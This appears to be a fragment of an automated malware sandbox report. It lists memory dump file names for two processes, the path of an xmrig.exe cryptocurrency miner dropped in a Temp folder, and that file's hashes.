SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3896-11-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-12-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-14-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/3896-15-0x0000023E71C30000-0x0000023E71C42000-memory.dmp

memory/3896-16-0x0000023E589D0000-0x0000023E589DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2888-47-0x00000243BAED0000-0x00000243BAEF0000-memory.dmp

memory/2888-48-0x00000243BB230000-0x00000243BB250000-memory.dmp

memory/2888-49-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/3896-51-0x00007FFA19893000-0x00007FFA19895000-memory.dmp

memory/2888-50-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/3896-52-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp

memory/2888-53-0x00000243BB250000-0x00000243BB270000-memory.dmp

memory/2888-54-0x00000243BCA30000-0x00000243BCA50000-memory.dmp

memory/2888-55-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-56-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-57-0x00000243BB250000-0x00000243BB270000-memory.dmp

memory/2888-58-0x00000243BCA30000-0x00000243BCA50000-memory.dmp

memory/2888-59-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-60-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-61-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-62-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-63-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-64-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-65-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-66-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp

memory/2888-67-0x00007FF799E80000-0x00007FF79AAB3000-memory.dmp